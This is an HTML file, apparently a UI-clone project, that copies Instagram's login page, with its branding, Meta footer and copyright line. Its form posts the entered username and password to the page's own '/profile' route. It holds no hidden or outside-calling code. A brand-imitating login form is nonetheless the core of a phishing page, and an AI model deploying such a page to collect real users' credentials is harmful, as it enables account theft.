<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <link rel="stylesheet" href="style.css">
</head>

<body>
    <div class="main">
        <img src="https://www.pngall.com/wp-content/uploads/15/iPhone-Frame-PNG-Images.png" class="bor">
        <img src="images/insta.png" class="in">

        
        <div class="log">

            <form method="post" action="/profile">
                <div class="ce">
                    <img src="images/instagram.png" class="ce">
                </div>
                <input type="text" name="username" class="email" placeholder="Phone number,username, or email">
                <br>
                <input type="password" name="password" class="email" placeholder="Password">
                <button class="logged email">Log in</button>
                <span class="or">
                    <div class="line1"></div>
                    <p class="line">OR</p>
                    <div class="line1"></div>
                </span>
                <span>
                    <span  class="fb">
                        <img src="images/fb.png" >
                        <p class="face"><a href="/" style="text-decoration: none;"> Log in with Facebook</a></p>
                    </span>
                    <br>
                    
                    <a href="/" class="forgot">Forgot password?</a>
                </span>
            </form>    
        </div>
        <div class="bottom">
            <div class="sign"> Don't have an account?<a href="/">Sign up</a></div>
            <span class="last">Get the app.</span>
            <span class="btn1">
                    <a class="btn btn-google" href="#" title="Google Play">Google Play</a>
                    <a class="btn2 btn2-google " href="#" title="Google Play">Microsoft</a>
            </span>
        </div>

        <div class="footer">
            <div class="ft1">
                <a href="/" >Meta</a>
                <a href="/">About</a>
                <a href="/">Blog</a>
                <a href="/">Jobs</a>
                <a href="/">Help</a>
                <a href="/">API</a>
                <a href="/">Privacy</a>
                <a href="/">Terms</a>
                <a href="/">Locations</a>
                <a href="/">Instagram Lite</a>
                <a href="/">Threads</a>
                <a href="/">Contact Uploading & Non-Users</a>
                <a href="/">Meta verified</a>
            </div>
            <div class="ft1">
                <select id="lang">
                    <option value="English">English</option>
                    <option value="English">Hindi</option>
                    <option value="English">Gernmay</option>
                </select>
                <p> &#169; 2024 Instagram from Meta</p>
            </div>
        </div>
    </div>
</body>

</html>